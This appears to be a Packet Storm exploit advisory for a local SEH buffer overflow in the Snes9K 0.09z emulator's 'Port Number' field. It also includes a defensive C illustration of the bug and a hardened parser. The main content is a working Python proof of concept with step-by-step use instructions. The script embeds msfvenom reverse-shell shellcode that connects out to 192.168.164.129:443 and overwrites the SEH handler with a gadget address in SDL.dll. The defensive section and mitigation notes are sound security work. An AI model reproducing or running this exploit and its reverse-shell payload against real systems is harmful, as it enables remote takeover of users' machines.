Snes9K 0.09z Local Buffer Overflow ≈ Packet Storm

Published on July 24th, 2020

# Exploit Title: Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)
# Date: 2020-07-20
# Exploit Author: MasterVlad
# Vendor Homepage: https://sourceforge.net/projects/snes9k/
# Software Link: https://www.exploit-db.com/apps/ef5249b64ce34575c12970b334a08c17-snes9k009z.zip
# Version: 0.09z
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 10 x64

# Proof of Concept:

# 1. Run the python script
# 2. Open exploit.txt and copy the content to clipboard
# 3. Open Snes9K 0.09z
# 4. Click on Netplay -> Connect to Server
# 5. Paste the clipboard into the "Port Number" field
# 6. Click on Connect and then on OK

```python
#!/usr/bin/python

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d" -f py

# Encoded payload as emitted by the msfvenom command above.
# Byte literals so the file is written as raw bytes under Python 3 as well as Python 2.
buf = b""
buf += b"\xd9\xc3\xbf\x7c\xdc\xed\x95\xd9\x74\x24\xf4\x58\x29"
buf += b"\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x04\xcf\x0f"
buf += b"\x60\x08\x07\x4d\x8b\xf0\xd8\x32\x05\x15\xe9\x72\x71"
buf += b"\x5e\x5a\x43\xf1\x32\x57\x28\x57\xa6\xec\x5c\x70\xc9"
buf += b"\x45\xea\xa6\xe4\x56\x47\x9a\x67\xd5\x9a\xcf\x47\xe4"
buf += b"\x54\x02\x86\x21\x88\xef\xda\xfa\xc6\x42\xca\x8f\x93"
buf += b"\x5e\x61\xc3\x32\xe7\x96\x94\x35\xc6\x09\xae\x6f\xc8"
buf += b"\xa8\x63\x04\x41\xb2\x60\x21\x1b\x49\x52\xdd\x9a\x9b"
buf += b"\xaa\x1e\x30\xe2\x02\xed\x48\x23\xa4\x0e\x3f\x5d\xd6"
buf += b"\xb3\x38\x9a\xa4\x6f\xcc\x38\x0e\xfb\x76\xe4\xae\x28"
buf += b"\xe0\x6f\xbc\x85\x66\x37\xa1\x18\xaa\x4c\xdd\x91\x4d"
buf += b"\x82\x57\xe1\x69\x06\x33\xb1\x10\x1f\x99\x14\x2c\x7f"
buf += b"\x42\xc8\x88\xf4\x6f\x1d\xa1\x57\xf8\xd2\x88\x67\xf8"
buf += b"\x7c\x9a\x14\xca\x23\x30\xb2\x66\xab\x9e\x45\x88\x86"
buf += b"\x67\xd9\x77\x29\x98\xf0\xb3\x7d\xc8\x6a\x15\xfe\x83"
buf += b"\x6a\x9a\x2b\x03\x3a\x34\x84\xe4\xea\xf4\x74\x8d\xe0"
buf += b"\xfa\xab\xad\x0b\xd1\xc3\x44\xf6\xb2\x2b\x30\x5c\xc3"
buf += b"\xc4\x43\x9c\xc5\xaf\xcd\x7a\xaf\xdf\x9b\xd5\x58\x79"
buf += b"\x86\xad\xf9\x86\x1c\xc8\x3a\x0c\x93\x2d\xf4\xe5\xde"
buf += b"\x3d\x61\x06\x95\x1f\x24\x19\x03\x37\xaa\x88\xc8\xc7"
buf += b"\xa5\xb0\x46\x90\xe2\x07\x9f\x74\x1f\x31\x09\x6a\xe2"
buf += b"\xa7\x72\x2e\x39\x14\x7c\xaf\xcc\x20\x5a\xbf\x08\xa8"
buf += b"\xe6\xeb\xc4\xff\xb0\x45\xa3\xa9\x72\x3f\x7d\x05\xdd"
buf += b"\xd7\xf8\x65\xde\xa1\x04\xa0\xa8\x4d\xb4\x1d\xed\x72"
buf += b"\x79\xca\xf9\x0b\x67\x6a\x05\xc6\x23\x9a\x4c\x4a\x05"
buf += b"\x33\x09\x1f\x17\x5e\xaa\xca\x54\x67\x29\xfe\x24\x9c"
buf += b"\x31\x8b\x21\xd8\xf5\x60\x58\x71\x90\x86\xcf\x72\xb1"

exploit = b"A"*420                        # padding up to the SEH record
exploit += b"\x74\x06\x75\x04"            # nSEH: short jump over the handler address
# 0x10015140 pop pop ret; SDL.dll
exploit += b"\x40\x51\x01\x10"            # SEH handler overwritten with the gadget address
exploit += b"\x41"*(2000-428-len(buf))    # filler so the whole field is 2000 bytes
exploit += buf

f = open("exploit.txt", "wb")
f.write(exploit)
f.close()
```
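The defect behind this advisory is a text field whose contents end up in a fixed-size native buffer without a length check. The following C is an added illustration of that bug class and its fix, not Snes9K's source (which is not on this page): the function names, the 32-byte buffer size and the sample inputs are all constructed. `port_from_field_unsafe` reproduces the pattern (unbounded copy, then `atoi`); `port_from_field` is the hardened form, which rejects anything that is not one to five decimal digits in the range 1..65535 before it touches any buffer, so a 2000-byte field of the kind the PoC writes is refused outright.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical reconstruction of the bug class (NOT Snes9K's real code):
 * the dialog text is copied into a small stack buffer with no bound, so an
 * oversized "Port Number" walks past it and over the SEH record on the stack. */
#define PORT_BUF 32
int port_from_field_unsafe(const char *field)
{
    char tmp[PORT_BUF];
    strcpy(tmp, field);   /* the defect: length of 'field' is never checked */
    return atoi(tmp);     /* and atoi silently accepts garbage */
}

/* Hardened form. Returns the port (1..65535) or -1 if the field is rejected.
 * The field is never scanned past 6 bytes, so an enormous input costs nothing. */
int port_from_field(const char *field)
{
    if (field == NULL)
        return -1;

    /* bounded length: stop as soon as we know it is longer than 5 digits */
    size_t n = 0;
    while (n <= 5 && field[n] != '\0')
        n++;
    if (n == 0 || n > 5)   /* empty, or longer than "65535" */
        return -1;

    /* only decimal digits are acceptable in a port field */
    for (size_t i = 0; i < n; i++)
        if (field[i] < '0' || field[i] > '9')
            return -1;

    /* now the copy is provably within bounds (n <= 5 < PORT_BUF) */
    char tmp[PORT_BUF];
    memcpy(tmp, field, n);
    tmp[n] = '\0';

    errno = 0;
    char *end = NULL;
    long v = strtol(tmp, &end, 10);
    if (errno != 0 || end == NULL || *end != '\0' || v < 1 || v > 65535)
        return -1;
    return (int)v;
}

/* Constructed sample: a field of 2000 'A' bytes, the same size class the PoC
 * above writes to exploit.txt. The hardened parser must reject it (-1). */
int reject_oversized_sample(void)
{
    char big[2001];
    memset(big, 'A', 2000);
    big[2000] = '\0';
    return port_from_field(big);
}

int main(void)
{
    const char *samples[] = { "443", "65535", "65536", "0", "12a", "" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("\"%s\" -> %d\n", samples[i], port_from_field(samples[i]));
    printf("2000 x 'A' -> %d\n", reject_oversized_sample());
    return 0;
}
```

Two design points. Validation happens on the raw field before any copy, and the length scan itself is bounded, so the parser's cost does not grow with the attacker's input. Separately, the PoC only works because the handler address it plants (`0x10015140` in SDL.dll) is a fixed address in a module without SafeSEH; building and shipping bundled dependencies with `/SAFESEH` and `/DYNAMICBASE` removes that class of gadget even where an overflow remains.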
